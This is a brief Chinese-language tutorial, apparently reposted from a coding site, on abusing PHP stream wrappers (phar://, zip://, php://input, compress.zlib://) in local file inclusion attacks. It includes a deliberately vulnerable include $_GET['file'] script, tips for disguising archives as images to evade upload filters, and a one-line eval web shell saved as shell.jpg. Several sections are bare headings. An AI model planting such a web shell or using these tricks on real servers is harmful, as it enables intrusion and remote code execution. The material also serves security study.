PHP伪协议-文件包含

本文主要是介绍PHP伪协议-文件包含，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

lfi.php案例代码

<?php
	include $_GET['file'];
?>

phar://、zip://、zlib://

  用于读取压缩文件，zip:// 、phart:// 、zlib:// 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀: jpg、png、gif、xxx等等。

php://input

  php://input 可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。
注:当enctype="multipart/form-data"，php://input 是无效的。

zip://

  如果不允许上传zip格式文件，可修改后缀为图片格式，phar协议和zip协议会无视利用的是什么包。
  zip://[压缩文件绝对路径]%23[压缩文件内的子文件名] (#编码为%23)

phar://

# shell.jpg
<?php @eval($_REQUEST[1]);?>

compress.zlib://

  如果是zip压缩包，后面不需要跟子文件

data://text/plain

这篇关于PHP伪协议-文件包含的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！